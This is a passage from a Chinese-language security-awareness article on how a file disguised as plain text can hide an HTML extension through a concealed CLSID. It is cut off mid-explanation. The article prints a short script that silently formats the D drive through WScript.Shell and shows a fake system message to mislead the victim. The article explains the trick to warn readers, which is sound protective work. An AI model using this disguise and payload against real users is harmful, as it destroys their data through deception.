只要类型为TXT的文件就没有危险 这样说对吗?

TXT文件也有危险是的！TXT文件不仅有危险，而且可以是非常的危险！不过，严格说来，应该给这个所谓的“TXT”文件加个引号，因为它们是看起来是TXT文件，实则是隐藏了期真实扩展名的其它文件，但在普通人看来它们的确是“TXT”文件！下面就让我们一起来了解一下这些危险的“TXT”文件。

　　一. 隐藏HTML扩展名的TXT文件

　　假如您收到的邮件附件中有一个看起来是这样的文件：QQ靓号放送.txt，您是不是认为它肯定是纯文本文件？我要告诉您，不一定！它的实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来，您看到的就是个.txt文件，这个文件实际上等同于QQ靓号放送.txt.html。那么直接打开这个文件为什么有危险呢？请看如果这个文件的内容如下：

　　<script>
　　a=new ActiveXObject("WSCript.Shell");
　　a.run("format.com d:/q /autotest /u");
　　alert("Windows is configuring the system. Please do not interrupt this process.");
　　</script>

　　您可能以为它会调用记事本来运行，可是如果您双击它，结果它却调用了HTML来运行，并且自动在后台开始格式化D盘，同时显示“Windows is configuring the system。Plase do not interrupt this process。”这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧？

　　欺骗实现原理：当您双击这个伪装起来的.txt时候，由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BD